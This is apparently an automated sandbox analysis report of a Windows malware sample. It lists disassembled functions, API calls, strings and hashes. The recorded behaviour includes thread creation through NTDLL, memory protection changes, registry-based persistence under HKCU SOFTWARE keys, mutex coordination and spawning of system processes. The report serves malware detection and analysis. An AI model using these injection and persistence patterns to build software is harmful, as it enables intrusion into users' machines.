                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$lstrcpy$Unmap$Close$Process$Wow64$CreateCurrent$Handle_memmove$DisableEventRedirection$Reset_memset$Address64CallHandle64HeapModuleObjectProcSingleWait_wcsrchr
                                                                                                            • String ID: 777367648777262762$897878765347627341$CloseHandle$D$GetProcAddress$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                                                            • API String ID: 456155699-117320160
                                                                                                            • Opcode ID: 778d0c2f63ec5a978ad47edb1216f1f1c4a6eee0e51fcb9a5b04390283969c11
                                                                                                            • Instruction ID: f50091ab440c20804cf0d656af9524036d8fe08315a7399b94b2540c7b0e7294
                                                                                                            • Opcode Fuzzy Hash: 778d0c2f63ec5a978ad47edb1216f1f1c4a6eee0e51fcb9a5b04390283969c11
                                                                                                            • Instruction Fuzzy Hash: 20321AB5A40219AFEB25DB64DC8DF9AB778AB48700F1045D8F60DA7290DB74AEC0CF54
                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0031811E
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00318181
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: 5$ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$H$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL$n
                                                                                                            • API String ID: 2574300362-974314553
                                                                                                            • Opcode ID: 2c35219de6259df2ac5fba70ea2357958de5f6d9b34d4e6df8344d2d473085c7
                                                                                                            • Instruction ID: 593c1078d9fed1b2d3bd944752f7a584f1287ff493915a854fdc0db2c72d2fbd
                                                                                                            • Opcode Fuzzy Hash: 2c35219de6259df2ac5fba70ea2357958de5f6d9b34d4e6df8344d2d473085c7
                                                                                                            • Instruction Fuzzy Hash: 51A22874905219DFCB6ACF64DC94BEAB7B9FB4C301F1484A9E50AA3240DB74AAC4CF54

                                                                                                            Control-flow Graph
                                                                                                            (graph of the function starting at 3141e0, rendered in the original report with nodes marked Executed / Not Executed; the API calls of its blocks are listed under APIs below)
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 003141FF
                                                                                                            • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,00000000,00000000,000F013F,00000000,00301585,00000000), ref: 00314226
                                                                                                            • RegCloseKey.KERNELBASE(00301585), ref: 00314238
                                                                                                            • _memset.LIBCMT ref: 00314246
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 00314265
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00314276
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 003141EE
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 003141E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
                                                                                                            • API String ID: 3491885642-838102593
                                                                                                            • Opcode ID: b4f2d3664f7676c5777fa556a2fd6acddf63637af90fcf0178c1bb5b17e89023
                                                                                                            • Instruction ID: 88735ca44f1301f1c8e4c1e937c2d1023276968fec0a0581d4155d2375dc125e
                                                                                                            • Opcode Fuzzy Hash: b4f2d3664f7676c5777fa556a2fd6acddf63637af90fcf0178c1bb5b17e89023
                                                                                                            • Instruction Fuzzy Hash: DA118A72A50219B6EB25D7B0DC4AFFA733CAB18700F000D54B609DA0C1FAB5E6D4C7A1

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 528 3100a0-3100d4 GetCommandLineW CommandLineToArgvW lstrcmpiW 529 3100e5-3100f9 lstrcmpiW 528->529 530 3100d6-3100e0 528->530 532 3101c6-3101da lstrcmpiW 529->532 533 3100ff-310112 IsUserAnAdmin 529->533 531 3103e9 530->531 534 3103ee-3103f1 531->534 535 3101e0-3101f9 OpenMutexW 532->535 536 3102a5-3102b9 lstrcmpiW 532->536 537 310114-310134 OpenEventW 533->537 538 31016c-31016e ExitProcess 533->538 541 310214-31022d OpenMutexW 535->541 542 3101fb-31020e WaitForSingleObject CloseHandle 535->542 539 3102bf-3102d8 OpenMutexW 536->539 540 31037e-310392 lstrcmpiW 536->540 543 310162-310164 ExitProcess 537->543 544 310136-310142 SetEvent 537->544 545 3102f3-31030c OpenMutexW 539->545 546 3102da-3102ed WaitForSingleObject CloseHandle 539->546 540->531 549 310394-31039b 540->549 547 310248-31024f 541->547 548 31022f-310242 WaitForSingleObject CloseHandle 541->548 542->541 550 310144-310150 CloseHandle ExitProcess 544->550 551 310156-31016a CloseHandle 544->551 552 310327-31032e 545->552 553 31030e-310321 WaitForSingleObject CloseHandle 545->553 546->545 554 310251-310271 OpenMutexW 547->554 555 31028b-31029b Sleep 547->555 548->547 556 3103d7-3103e7 Sleep 549->556 557 31039d-3103bd OpenMutexW 549->557 565 310174-31017b 551->565 559 310330-310350 OpenMutexW 552->559 560 31036a-31037a Sleep 552->560 553->552 561 310273-310285 CloseHandle Sleep 554->561 562 310287 554->562 555->534 556->534 563 3103d3 557->563 564 3103bf-3103d1 CloseHandle Sleep 557->564 568 310352-310364 CloseHandle Sleep 559->568 569 310366 559->569 560->534 561->547 562->555 563->556 564->549 566 3101b7-3101bc 565->566 567 31017d-31019d OpenMutexW 565->567 566->534 570 3101b3 567->570 571 31019f-3101b1 CloseHandle Sleep 567->571 568->552 569->560 570->566 571->565
APIs
• GetCommandLineW.KERNEL32 ref: 003100A6
• CommandLineToArgvW.SHELL32(?,?), ref: 003100B7
• lstrcmpiW.KERNELBASE(?,{34E50511-FBB8-42F8-98A2-2629192A03A0}), ref: 003100CC
• lstrcmpiW.KERNEL32(?,{D77DC119-1B4A-41E3-A066-2927413CA76D}), ref: 003100F1
• IsUserAnAdmin.SHELL32 ref: 00310109
• OpenEventW.KERNEL32(00100002,00000000,{8399C93C-77D8-4A9E-96D7-0200E8B3EE42}), ref: 00310127
• SetEvent.KERNEL32(00000000), ref: 0031013A
• CloseHandle.KERNEL32(00000000), ref: 00310148
• ExitProcess.KERNEL32 ref: 00310150
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CommandEventLinelstrcmpi$AdminArgvCloseExitHandleOpenProcessUser
• String ID: {0F01F64A-5A5B-4CC4-B069-D85368F634DD}${34E50511-FBB8-42F8-98A2-2629192A03A0}${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${8399C93C-77D8-4A9E-96D7-0200E8B3EE42}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${9D5F29AE-FCE3-40C6-8BE3-47B8C62D31E2}${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}${D77DC119-1B4A-41E3-A066-2927413CA76D}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
• API String ID: 786710000-2393832290
• Opcode ID: 79d026693474232b16b0f33343bceec693f0f67590dcb0d47750eb582f972c19
• Instruction ID: e37879f036d7fe55111e81e32b96f577fdf64acc0bec22aee32c469fa7472f9c
• Opcode Fuzzy Hash: 79d026693474232b16b0f33343bceec693f0f67590dcb0d47750eb582f972c19
• Instruction Fuzzy Hash: 93910974A40304EBD72E9BA4DD8DBEE7B79BB4C702F108529F516A62D0DBB894C0CB51

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 572 316410-31644c LocalAlloc 573 316452-316476 572->573 574 316865 572->574 577 31684a-31684e 573->577 578 31647c-316480 573->578 575 316867-31686a 574->575 579 316850-316856 577->579 580 316858-31685f LocalFree 577->580 578->577 581 316486-316494 578->581 579->575 580->574 582 316496-3164a7 call 325d7b 581->582 583 3164aa-3164bd 581->583 582->583 585 3164bf-316509 call 32359a call 325d7b 583->585 586 31650e-316521 583->586 600 316845 585->600 587 316527-316541 LocalAlloc 586->587 588 3165cc-3165df 586->588 591 3165c7 587->591 592 316547-31655b GetWindowsDirectoryW 587->592 593 3165e1-3165f9 SHGetKnownFolderPath 588->593 594 31665e-316671 588->594 591->600 596 3165ba-3165c1 LocalFree 592->596 597 31655d-3165b3 call 32359a call 325d7b 592->597 601 316659 593->601 602 3165fb-316652 call 32359a CoTaskMemFree call 325d7b 593->602 598 3166f0-316703 594->598 599 316673-31668b SHGetKnownFolderPath 594->599 596->591 597->596 608 316709-316723 LocalAlloc 598->608 609 3167b8-3167cb 598->609 606 3166eb 599->606 607 31668d-3166e4 call 32359a CoTaskMemFree call 325d7b 599->607 601->600 602->601 606->600 607->606 614 3167b3 608->614 615 316729-31673d GetTempPathW 608->615 609->600 613 3167cd-3167e5 SHGetKnownFolderPath 609->613 613->600 620 3167e7-31683e call 32359a CoTaskMemFree call 325d7b 613->620 614->600 621 3167a6-3167ad LocalFree 615->621 622 31673f-31679f call 301c60 call 32359a call 325d7b 615->622 620->600 621->614 622->621
APIs
• LocalAlloc.KERNELBASE(00000040,?), ref: 00316439
• _wcscat.LIBCMT ref: 003164A2
• __snwprintf.LIBCMT ref: 003164E4
• _wcscat.LIBCMT ref: 003164FA
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031652E
• GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 00316553
• __snwprintf.LIBCMT ref: 00316595
• _wcscat.LIBCMT ref: 003165AB
• LocalFree.KERNEL32(00000000), ref: 003165C1
• SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,?), ref: 003165F1
• __snwprintf.LIBCMT ref: 00316627
• CoTaskMemFree.COMBASE(?), ref: 00316636
• _wcscat.LIBCMT ref: 0031664A
• SHGetKnownFolderPath.SHELL32(00337C40,00000000,00000000,?), ref: 00316683
• __snwprintf.LIBCMT ref: 003166B9
• CoTaskMemFree.COMBASE(?), ref: 003166C8
• _wcscat.LIBCMT ref: 003166DC
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00316710
• GetTempPathW.KERNEL32(00000104,00000000), ref: 00316735
• LocalFree.KERNEL32(00000000), ref: 003167AD
  • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
• __snwprintf.LIBCMT ref: 00316781
• _wcscat.LIBCMT ref: 00316797
• SHGetKnownFolderPath.SHELL32(00337C10,00000000,00000000,?), ref: 003167DD
• __snwprintf.LIBCMT ref: 00316813
• CoTaskMemFree.COMBASE(?), ref: 00316822
• _wcscat.LIBCMT ref: 00316836
• LocalFree.KERNEL32(00000000), ref: 0031685F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: _wcscat$FreeLocal__snwprintf$Path$AllocFolderKnownTask$DirectoryTempWindows_wcsrchr
• String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
• API String ID: 3511546674-4258658051
• Opcode ID: 98cfebd92ab05c3875e0237a53451740adbff69973350cff7bf216ca5b7d19ea
• Instruction ID: 57de9cd5a01d794fd616c065124027c51d501cf85429f4b7a61b1c19ae09c942
• Opcode Fuzzy Hash: 98cfebd92ab05c3875e0237a53451740adbff69973350cff7bf216ca5b7d19ea
• Instruction Fuzzy Hash: 78B151B1A4011DEBDB29DB90DC8AFE9B779AB68300F1081A8E50DAB191D7749FC5CF50

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: _memset$__snwprintf$Directory$FileModuleNameSystemWindows
• String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
• API String ID: 60459999-2596767422
• Opcode ID: fd717997b1a53d42618b39f38ec5a29df894ca0b4bb3739ab5bd723b9dca22df
• Instruction ID: 616acfafb75979e1614b3ccd3e3578af9fbd9d0f59a8f589d43f608a18b18a70
• Opcode Fuzzy Hash: fd717997b1a53d42618b39f38ec5a29df894ca0b4bb3739ab5bd723b9dca22df
• Instruction Fuzzy Hash: F441B775B103186AD761EB649C86FEA7378AF48700F008598B61DE60C1FBB48B94CB91

Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 664 316870-31688d LocalAlloc 665 316991 664->665 666 316893-3168a4 GetSystemDirectoryW 664->666 667 316993-316996 665->667 668 316987-31698b LocalFree 666->668 669 3168aa-3168be LocalAlloc 666->669 668->665 669->668 670 3168c4-316960 call 3179f0 call 32359a call 323520 CreateProcessW 669->670 677 316962-31697b LocalFree * 2 670->677 678 31697d-316981 LocalFree 670->678 677->667 678->668
APIs
• LocalAlloc.KERNELBASE(00000040,0000FFFE), ref: 00316880
• GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 0031689C
• LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 003168B1
  • Part of subcall function 003179F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,003168E6,003347E8), ref: 00317A19
• __snwprintf.LIBCMT ref: 003168FD
• _memset.LIBCMT ref: 00316910
• CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00316957
• LocalFree.KERNELBASE(00000000), ref: 00316966
• LocalFree.KERNELBASE(00000000), ref: 00316970
• LocalFree.KERNEL32(00000000), ref: 00316981
• LocalFree.KERNEL32(00000000), ref: 0031698B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
• String ID: D$G3
• API String ID: 2329958830-2481853025
• Opcode ID: 8155eacb707956a3ab6822000f299226f7efd0e45024ec2e763573ff8cf6e21e
• Instruction ID: f66260a6b91b31176bb43fe230bf26f338721d327f4c324174fe41e1ac008a13
• Opcode Fuzzy Hash: 8155eacb707956a3ab6822000f299226f7efd0e45024ec2e763573ff8cf6e21e
• Instruction Fuzzy Hash: F63182B5A10208BBDB25DBA4DC89FEDBB78AF48700F1045A8F609AA190DB755AC4CB50

Control-flow Graph

control_flow_graph 679 3142a0-3142f2 call 323520 GetModuleFileNameW 682 3143c6 679->682 683 3142f8-31431b call 31c570 679->683 685 3143c8-3143cb 682->685 683->682 687 314321-314361 call 32359a RegOpenKeyExW 683->687 690 314363-314389 RegSetValueExW 687->690 691 3143b9-3143c0 LocalFree 687->691 692 31438b-3143aa RegCloseKey LocalFree 690->692 693 3143ac-3143b3 RegCloseKey 690->693 691->682 692->685 693->691
APIs
• _memset.LIBCMT ref: 003142D4
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003142EA
  • Part of subcall function 0031C570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0031430B,?,00000000), ref: 0031C58C
  • Part of subcall function 0031C570: GetFileSize.KERNEL32(000000FF,00000000,?,0031430B,?), ref: 0031C5A1
  • Part of subcall function 0031C570: LocalAlloc.KERNELBASE(00000040,000000FF,?,0031430B), ref: 0031C5B6
  • Part of subcall function 0031C570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0031C5D7
  • Part of subcall function 0031C570: CloseHandle.KERNEL32(000000FF), ref: 0031C5ED
• __snwprintf.LIBCMT ref: 00314337
• RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 00314359
• RegSetValueExW.KERNELBASE(?,{2DD5D29F-1CE3-49E7-8572-9D856412ED59},00000000,00000003,00000000,00000000), ref: 00314381
• RegCloseKey.ADVAPI32(?), ref: 00314392
• LocalFree.KERNEL32(00000000), ref: 0031439F
• RegCloseKey.ADVAPI32(?), ref: 003143B3
• LocalFree.KERNEL32(00000000), ref: 003143C0
Strings
• {2DD5D29F-1CE3-49E7-8572-9D856412ED59}, xrefs: 00314375
• SOFTWARE\%s, xrefs: 00314326
• {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00314321
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Similarity
• API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
• String ID: SOFTWARE\%s${2DD5D29F-1CE3-49E7-8572-9D856412ED59}${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}
• API String ID: 3609211549-3847718966
• Opcode ID: ccb132e6ac97f16b66b2c2bf33d6ae00e4ecdad0652bab35d4541fb35c677a47
• Instruction ID: afd083e09e24275ba54dc58c22bda5b13990ae0626e1d0a9b6ea9a5df576995e
• Opcode Fuzzy Hash: ccb132e6ac97f16b66b2c2bf33d6ae00e4ecdad0652bab35d4541fb35c677a47
• Instruction Fuzzy Hash: A82180B5A40318ABD735DB60DC4DFEA7778AF48700F108688B61CA6181E7B49AC4CFA1

Control-flow Graph

control_flow_graph 694 30ff10-30ff2b SHGetKnownFolderPath 695 30ff31-30ff45 LocalAlloc 694->695 696 30ffff 694->696 698 30fff5-30fff9 CoTaskMemFree 695->698 699 30ff4b-30ff72 wnsprintfW 695->699 697 310001-310004 696->697 698->696 700 30ff74-30ff80 call 310400 699->700 701 30ffeb-30ffef LocalFree 699->701 700->701 704 30ff82-30ffa7 CreateDirectoryW 700->704 701->698 705 30ffb6-30ffd9 LocalFree * 2 CoTaskMemFree 704->705 706 30ffa9-30ffb4 GetLastError 704->706 705->697 706->705 707 30ffdb-30ffdf 706->707 707->701 708 30ffe1-30ffe5 LocalFree 707->708 708->701
APIs
• SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00371178,?,?,?,?,003015DF,00371178), ref: 0030FF23
• LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,003015DF,00371178), ref: 0030FF38
• wnsprintfW.SHLWAPI ref: 0030FF67
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00371178), ref: 0030FFEF
  • Part of subcall function 00310400: AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031044D
  • Part of subcall function 00310400: _memset.LIBCMT ref: 00310463
  • Part of subcall function 00310400: SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 003104A0
  • Part of subcall function 00310400: LocalAlloc.KERNEL32(00000040,00000014), ref: 003104B3
  • Part of subcall function 00310400: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 003104C8
  • Part of subcall function 00310400: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 003104DE
• CreateDirectoryW.KERNELBASE(?,0000000C), ref: 0030FF9E
• GetLastError.KERNEL32 ref: 0030FFA9
• LocalFree.KERNEL32(00000000), ref: 0030FFBA
• LocalFree.KERNELBASE(?), ref: 0030FFC4
• CoTaskMemFree.COMBASE(00371178), ref: 0030FFCE
• LocalFree.KERNEL32(00000000), ref: 0030FFE5
• CoTaskMemFree.COMBASE(00371178), ref: 0030FFF9
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Similarity
• API ID: FreeLocal$AllocDescriptorInitializeSecurityTask$AllocateCreateDaclDirectoryEntriesErrorFolderKnownLastPath_memsetwnsprintf
• String ID: %s\%s
• API String ID: 4260852628-4073750446
• Opcode ID: 3b02d7a948223fbfe3af0eb5461e221f849ebe60cbd470944ab9fa6849c641ab
• Instruction ID: a01d5f45373c6d5515db0ee171313bf7d9924bf8055e902ea70e464b45909571
• Opcode Fuzzy Hash: 3b02d7a948223fbfe3af0eb5461e221f849ebe60cbd470944ab9fa6849c641ab
• Instruction Fuzzy Hash: 39211074900209EFDB25DFA8DC89BEEBB79AF48305F108468F605E6690C7749A80CB51

Control-flow Graph

control_flow_graph 709 3143d0-31440e call 323520 GetModuleFileNameW 712 314414-314454 call 32359a RegOpenKeyExW 709->712 713 3144aa 709->713 712->713 717 314456-314487 lstrlenW RegSetValueExW 712->717 715 3144ac-3144af 713->715 718 314489-31449b RegCloseKey 717->718 719 31449d-3144a4 RegCloseKey 717->719 718->715 719->713
APIs
• _memset.LIBCMT ref: 003143F0
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00314406
• __snwprintf.LIBCMT ref: 0031442A
• RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000102,?), ref: 0031444C
• lstrlenW.KERNEL32(?), ref: 0031445D
• RegSetValueExW.KERNELBASE(?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000000,00000001,?,00000002), ref: 0031447F
• RegCloseKey.ADVAPI32(?), ref: 00314490
• RegCloseKey.ADVAPI32(?), ref: 003144A4
Strings
• SOFTWARE\%s, xrefs: 00314419
